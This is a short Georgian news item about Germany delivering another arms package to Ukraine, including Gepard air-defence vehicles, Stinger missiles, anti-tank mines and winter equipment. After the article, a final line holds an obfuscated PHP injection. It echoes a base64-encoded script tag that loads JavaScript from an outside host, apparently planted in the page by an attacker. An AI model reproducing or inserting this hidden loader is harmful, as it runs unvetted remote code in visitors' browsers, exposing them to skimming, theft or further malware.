celsiusi
ავერსი საქკაბელი
გერმანიის მთავრობამ უკრაინას იარაღის მორიგი პარტია გადასცა. ამის შესახებ შესაბამისი ინფორმაცია გერმანიის მთავრობამ გაავრცელა, რომლის ცნობითაც, უკრაინულმა მხარემ მიიღო ხუთი საევაკუაციო ჯავშანმანქანა Bergepanzer 2, შვიდი მძიმე და საშუალო პონტონური სისტემა, 167 ათასი ვაზნა ცეცხლსასროლი იარაღისთვის, 30 საზენიტო თვითმავალი დანადგარი „გეპარდი“, Stinger 500 საზენიტო რაკეტა, 15 ათასამდე ტანკსაწინააღმდეგო ნაღმი, 350 ათასი დეტონატორი ასევე დრონების საწინააღმდეგო აღჭურვილობა.
 
ამას გარდა, უკრაინამ გერმანიისგან მიიღო სხვადასხვა აღჭურვილობა და სამხედროებისთვის ზამთრის ეკიპირება.
 
მანამდე, გერმანიამ უკრაინას უახლესი საზენიტო-სარაკეტო კომპლექსი IRIS-T გადასცა.
434
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");